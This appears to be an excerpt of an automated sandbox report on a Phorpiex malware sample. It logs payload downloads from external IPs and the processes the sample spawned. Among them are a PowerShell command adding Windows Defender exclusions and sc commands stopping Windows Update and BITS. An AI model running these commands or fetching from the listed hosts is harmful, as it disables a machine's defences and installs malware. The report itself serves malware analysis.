Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49823 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 7488 | Process: C:\Windows\sysppvrdnvs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 07:26:40.477576971 CEST | 166 | OUT | GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
Oct 26, 2024 07:26:41.389425039 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 05:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 8960
Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
Connection: keep-alive
ETag: "671230ee-2300"
Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                        Oct 26, 2024 07:26:41.389451981 CEST1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                        Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                                        Oct 26, 2024 07:26:41.389468908 CEST1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                                        Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                                        Oct 26, 2024 07:26:41.389489889 CEST1236INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                                                        Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                                                        Oct 26, 2024 07:26:41.389504910 CEST1236INData Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc
                                                                                                                                                        Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%
                                                                                                                                                        Oct 26, 2024 07:26:41.389520884 CEST1236INData Raw: 94 04 da 8e d4 c0 98 3e 24 6d 01 7b 78 3d 57 2b 8b 06 77 55 2d 93 2b 04 bb 96 97 82 3d 6b 0f a9 c8 ef 2f e2 ce 5d 74 af 33 db 0c 35 3d f4 cd c7 65 c3 05 79 78 24 ce f4 a6 99 58 93 43 df f2 17 d2 12 2f 0c c1 a0 51 33 10 28 3d c5 a6 ec 61 a7 46 c8
                                                                                                                                                        Data Ascii: >$m{x=W+wU-+=k/]t35=eyx$XC/Q3(=aFS3RJr^{@[W\)9f>F}+V1*p0RQO{jwdL0_2}hGn[>q>a r{tVJ0sN]Q\-#6npc`
                                                                                                                                                        Oct 26, 2024 07:26:41.389535904 CEST1236INData Raw: d3 90 d1 fd d7 07 74 76 fe e7 1d df 46 a6 78 b3 3b 32 6d d7 75 d6 e6 a1 f8 ad 93 84 f2 7f 70 fa 89 4b 36 27 09 96 bc b1 c7 59 94 41 08 18 1d 5f 62 ee ed a0 2c 51 1b 21 fd cb 69 5e 5b 4f 79 a3 18 ee 3b 5f a3 09 af 9e 3b d6 57 f1 8e a7 51 41 72 bb
                                                                                                                                                        Data Ascii: tvFx;2mupK6'YA_b,Q!i^[Oy;_;WQAr_2H}/%~.6*rjk>DQgo_7}-)i&O%[u{zhaRIN9<[C&WK,+-27}#hH?FDr2Ey#s
                                                                                                                                                        Oct 26, 2024 07:26:41.389553070 CEST572INData Raw: 55 e5 ce d3 04 5e db d4 1d 7b f1 54 f1 b2 98 ad 4d 05 61 bb 44 52 dc d6 71 c2 cd 92 2d bb 49 dd a2 94 56 b2 b2 25 da 20 db e3 b2 38 79 3f fa da 49 f5 48 08 d8 37 e6 42 37 9c 23 52 b2 14 9d 3f 51 1c 92 66 1d 0c 45 5e a7 ad b6 d4 a1 fd 2f f0 9f f8
                                                                                                                                                        Data Ascii: U^{TMaDRq-IV% 8y?IH7B7#R?QfE^/CWIyjuk&x9a6TQ)t!)z[c=FR"#{'qd(;I0}<l#%/0>$L%j,6SpcqFjAc0%GhGci,g


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49841 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 7488 | Process: C:\Windows\sysppvrdnvs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 07:26:43.770405054 CEST | 171 | OUT | GET /dwntbl HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141
Oct 26, 2024 07:26:44.712740898 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 05:26:44 GMT
Content-Type: application/octet-stream
Content-Length: 85760
Last-Modified: Thu, 10 Oct 2024 07:40:46 GMT
Connection: keep-alive
ETag: "670784fe-14f00"
Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 73 9b e7 57 5d 0f d3 d2 df 96 5f cd 0b 7c 4f ed 0c 59 d0 57 11 1e d2 e1 d7 80 f2 d5 71 10 6a 2a 87 07 22 a6 6e cb ec f0 12 2b 90 48 7c 5c 16 07 b9 45 84 db 5b 0a 45 14 0a 85 27 cc d7 59 7c da 9a 7b 65 fc bd 3a fa 59 0e 93 5d 05 00 75 cc 1f a7 e0 58 a4 00 6a 1d 1a 9d b3 52 e6 b5 0f 65 00 37 82 7e 11 70 29 d8 ff d3 7f 78 7e e8 6a b3 03 74 22 aa 75 0a 3e 4e 93 86 8f b5 6a 07 3e c5 d8 6b 40 22 08 93 91 df a9 65 51 ba ae b8 e0 c8 6f 4e 8c ac e2 9d 3b 24 34 1b 93 8f f4 78 b3 6e 76 b5 c4 13 f7 e3 32 60 41 bf 53 cc 98 0b f3 1a bf 74 bd 52 b8 1c 29 4f e9 c4 e2 82 d4 b2 f8 b7 0a 11 b2 be a8 25 a0 53 0e d1 ce da 31 eb 63 a9 59 c5 1f 8a d9 02 58 af ae c8 c9 d4 fa d3 e8 9f 75 1b 4e af 82 94 08 2a 54 0b 9a 60 cf 58 b6 57 56 bd c6 0a 54 8a e6 70 e6 66 05 db 03 84 b9 2b 25 e7 7b 25 5d 50 e3 db c0 7a dc 3b dd 8d e0 cf f1 1f e1 7a ed 83 b6 92 25 c6 22 b1 a6 c3 ae 1b b6 56 0f 7a 67 5a 13 cb 6a f1 c9 f6 7f eb a8 9e 1a 49 3b fa 62 7a f9 8f 2e 10 81 4d 4d 62 d8 b2 c0 62 35 68 1b e3 19 6d 92 6f e9 25 00 d2 91 21 07 4d 9d [TRUNCATED]
                                                                                                                                                        Data Ascii: sW]_|OYWqj*"n+H|\E[E'Y|{e:Y]uXjRe7~p)x~jt"u>Nj>k@"eQoN;$4xnv2`AStR)O%S1cYXuN*T`XWVTpf+%{%]Pz;z%"VzgZjI;bz.MMbb5hmo%!Mt0xpg&v2Hoc:?W{6FV#m_Mo24)OW#E>?WiUV#p{%I}hb$lm1s^z'4{spxWP?QE)!U:07(t60pwah_4\N}c|]{cV'yfd.CI:U+Q"fyO9/f}mL{ZO$E).6$dtc?1>H'4U^<W%,1%((180aqv!kxX-|M1Z^\oqyq].{~}D7K{2auOWa["E?!DS*ySexPJ K@~nZH/MY"tZO|nNuX\^s-[a[3Ks-@5zH|{I uU
                                                                                                                                                        Oct 26, 2024 07:26:44.712759018 CEST1236INData Raw: 80 b5 d7 f9 5b 0f c6 8c 89 48 4e a5 7d ec ec b7 81 41 9b e2 ba 5a 73 79 30 a4 03 3d 69 39 77 3a b5 22 f0 12 25 1c 3b 8d 3d 2a 07 fb 31 ad 6b 58 9c f7 38 e5 76 eb 84 dd 18 91 5c 0c 56 9e 5f 05 39 22 e3 c8 e5 8d 0b eb 2a 4d f3 0f 23 8b eb 23 4b db
                                                                                                                                                        Data Ascii: [HN}AZsy0=i9w:"%;=*1kX8v\V_9"*M##K5sN:$!;3*`Nj=g4;N)TJ9E+&}TrUDJ^J3[PO<utH?u%
                                                                                                                                                        Oct 26, 2024 07:26:44.712769985 CEST424INData Raw: 4f 01 2b ed 3e 8d 0a 28 fd 86 a8 c1 f8 c9 ff 2c 83 0b c0 df 28 08 0a 68 a7 d6 bc 7f 84 88 04 d8 bb a1 b4 e2 13 e6 e4 f2 17 49 14 c4 50 f9 f5 18 a2 ec 8d fd 05 45 b1 83 b3 96 3f b0 42 05 3d 49 9d 59 63 97 2e 71 e6 28 37 1f 33 7b 73 68 a1 fb 7f 3e
                                                                                                                                                        Data Ascii: O+>(,(hIPE?B=IYc.q(73{sh>=1I4M2tHdT?GI0)}g`f2[&gU" +1B w[ \o]4VpO3m:&xDrCg7"KctAPFF+X&JR
                                                                                                                                                        Oct 26, 2024 07:26:44.712780952 CEST1236INData Raw: d6 6e 8f 12 b2 6a 77 5b d1 28 81 a3 ae d5 42 58 c2 0d 89 59 9c 6c 9b e9 76 99 83 68 a1 d0 f6 3c 94 0e 9d 17 21 92 71 69 78 eb 62 fc a6 87 4b 1d 6f 9b 62 ad 16 e6 96 e5 a8 e4 ab 7b cd 5c 89 8a a6 b9 6e 28 85 9b 64 17 8c db 27 3a 85 9d a3 56 71 0b
                                                                                                                                                        Data Ascii: njw[(BXYlvh<!qixbKob{\n(d':Vq]`6q^V(K |6)=u/3IGW =wJV>?/|Q+,;BWQL4\*M]|zoF=J F1: qdQ00"bVN:p
                                                                                                                                                        Oct 26, 2024 07:26:44.712871075 CEST1236INData Raw: 73 00 1f 07 72 99 ef 58 7f 95 a6 f1 2c d8 da 97 6c a5 8b 66 99 c5 09 78 18 1a fc 89 9a 27 0b c9 47 83 0a 8e 0c 5a 8e a5 0d 00 b1 a5 a9 e5 ae 12 20 da b4 f0 a0 43 87 80 5c 91 87 0e a6 5d df 58 2a d9 82 ca 28 c6 1c ea b6 b8 0b 1a 19 1a 19 b6 fc 47
                                                                                                                                                        Data Ascii: srX,lfx'GZ C\]X*(G{Q8apCZ>aP9+Pjn$bR(YmZ>\D^OcQ.')5m8RYyo]^/%5Gsn"V(4 ):o
                                                                                                                                                        Oct 26, 2024 07:26:44.712889910 CEST424INData Raw: 8c 1c 9a 57 fd b4 ef 94 f8 63 d5 ce 50 6e cf 16 08 e3 f2 3b d2 e3 73 b3 a5 1c 61 1d 19 09 d6 bd 99 ec b8 a1 86 fa 98 b2 d2 fe 44 de 79 e4 08 1a f8 a1 f7 68 4d 7c 8e ab ae ba 39 f8 b9 e3 0b 50 fa 39 70 d0 2c 7f f0 3c 24 f7 c9 7f 5a 72 8f 02 4b 0f
                                                                                                                                                        Data Ascii: WcPn;saDyhM|9P9p,<$ZrK+..hsAB2~R[Jh/wrSLC|E/Z`nTjtKeA#2wI3RieZ}T,{T3# 2\.#W-,A|2mGK
                                                                                                                                                        Oct 26, 2024 07:26:44.712903023 CEST1236INData Raw: 03 09 67 9e 94 0b a9 8f 2f af 32 2a 79 22 47 0d f6 6d 61 b0 89 16 a0 bd b0 51 56 5f 06 9d 51 37 03 38 58 77 07 85 00 b1 22 3d a9 e4 69 5e ec 1d 08 16 72 73 bd 16 d5 0f 40 1e 36 d0 e9 f4 a3 f1 b9 8d 30 fd 1d 0b e3 cc 92 fe 40 70 3e 8e f5 89 14 79
                                                                                                                                                        Data Ascii: g/2*y"GmaQV_Q78Xw"=i^rs@60@p>yu?lwY]wyHEnx[F=v=#5)NrLGNL,`X0lC%181>1gAU/P(uTBO}kH.eL0sNHAJ{E1xwuq0!NMag
                                                                                                                                                        Oct 26, 2024 07:26:44.712913036 CEST212INData Raw: f4 e1 fe 2d f1 a8 34 f7 87 2f ed 69 be 62 f0 bd f8 14 a6 a4 e2 9b a5 39 f5 ba 74 8c 7e 3b 57 f1 f7 41 6c 2d a6 80 61 d4 e7 1f 64 94 50 18 24 96 1e 4d 77 33 08 e9 ea fb 28 f0 36 04 92 80 3b 09 cc d7 7b a4 b4 88 cc e4 ca 7b 02 4d 72 52 92 e3 42 23
                                                                                                                                                        Data Ascii: -4/ib9t~;WAl-adP$Mw3(6;{{MrRB#PqLu'&3V`rgHa~*.FKp'*9CGlqlLx[ER*)DaO2_Vwr!B(w*)jodHBRQ
                                                                                                                                                        Oct 26, 2024 07:26:44.712924004 CEST1236INData Raw: 60 e5 f4 52 10 c6 69 99 38 e9 e1 78 6d 42 b5 a3 59 2b 55 93 43 ea d5 d5 57 07 53 28 bb 96 f6 36 2d 8b 78 31 b5 d9 9b ca 37 0f c6 8e 64 f8 b3 dd 2b 1f 43 b5 7f 97 e8 db 83 b1 e0 c5 90 1c 1c 1d 0f af 13 0e f9 f2 7f be af ba 6a 3b c5 f2 01 57 d9 25
                                                                                                                                                        Data Ascii: `Ri8xmBY+UCWS(6-x17d+Cj;W%~I*Ws?C~XoIqlOO'8yE9k@)nxf(C8v}K,bP:$9LfNlt~fg"nm1ldPzb^4F)<z @7$T0hQ
                                                                                                                                                        Oct 26, 2024 07:26:44.712943077 CEST1236INData Raw: e3 65 30 35 de c5 15 fd 1d 77 04 21 d5 fe e2 90 00 ed e7 d4 87 07 36 26 7e a0 0d 9c b4 02 33 6a 7d 16 a0 a3 18 24 a6 15 c4 7e 61 c6 ef d1 98 45 f7 a4 a7 2a 60 9d 31 1e c5 f9 60 f7 7e 44 8b 59 9a 4d 93 75 99 9c 47 e1 50 d8 f0 e3 98 6d af 27 82 32
                                                                                                                                                        Data Ascii: e05w!6&~3j}$~aE*`1`~DYMuGPm'2:%kN-adB}.]en8.?,dmfMls?=n&*-"{w#WVlC2>R*"eGf9Jh4&~</cEK~\cuqS.f"A41
                                                                                                                                                        Oct 26, 2024 07:26:44.718314886 CEST1236INData Raw: 9d ec 27 8d da 3a 8b c7 ae 30 3f 50 02 01 31 a6 e2 2b 8f 1c e6 f5 07 8a b7 5e bd fc 94 7c fa 96 96 81 84 1f 43 d1 7a e8 8f 2b 30 36 6a 99 61 3b d3 fb 68 d9 10 0b bf 01 27 b8 47 2b 54 16 79 ad 1c 6d fa 02 b5 80 d1 b1 39 ad fe 76 cd 4b 00 9b fc 6b
                                                                                                                                                        Data Ascii: ':0?P1+^|Cz+06ja;h'G+Tym9vKkVDfy|Y[4i!38*NzrfY5VYlA~Y+ijpWpYGF3Wp2t)B|0(t$K"Vx|(ZSm


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49864 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 7488 | Process: C:\Windows\sysppvrdnvs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 07:26:47.471978903 CEST | 166 | OUT | GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
Oct 26, 2024 07:26:48.392946005 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 05:26:48 GMT
Content-Type: application/octet-stream
Content-Length: 16128
Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
Connection: keep-alive
ETag: "66f3a973-3f00"
Accept-Ranges: bytes

Target ID: 0
Start time: 01:26:15
Start date: 26/10/2024
Path: C:\Users\user\Desktop\thcdVit1dX.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\thcdVit1dX.exe"
Imagebase: 0x400000
File size: 1'390'680 bytes
MD5 hash: CBD0E8F0C0AEFE122D41029C119624CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 01:26:16
Start date: 26/10/2024
Path: C:\Users\user\AppData\Local\Temp\4BBF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\4BBF.exe"
Imagebase: 0xc90000
File size: 9'728 bytes
MD5 hash: 8D8E6C7952A9DC7C0C73911C4DBC5518
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 66%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 01:26:21
Start date: 26/10/2024
Path: C:\Users\user\AppData\Local\Temp\71384504.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\71384504.exe
Imagebase: 0x400000
File size: 85'504 bytes
MD5 hash: 06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\71384504.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 4
Start time: 01:26:23
Start date: 26/10/2024
Path: C:\Windows\sysppvrdnvs.exe
Wow64 process (32bit): true
Commandline: C:\Windows\sysppvrdnvs.exe
Imagebase: 0x400000
File size: 85'504 bytes
MD5 hash: 06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 5
Start time: 01:26:26
Start date: 26/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 01:26:26
Start date: 26/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 01:26:26
Start date: 26/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                        Imagebase:0x200000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop UsoSvc
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop WaaSMedicSvc
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop wuauserv
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:01:26:27
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop DoSvc
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:01:26:27
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop BITS /wait
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:01:26:28
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        Imagebase:0x7ff6ef0c0000
                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:17
                                                                                                                                                        Start time:01:26:36
                                                                                                                                                        Start date:26/10/2024
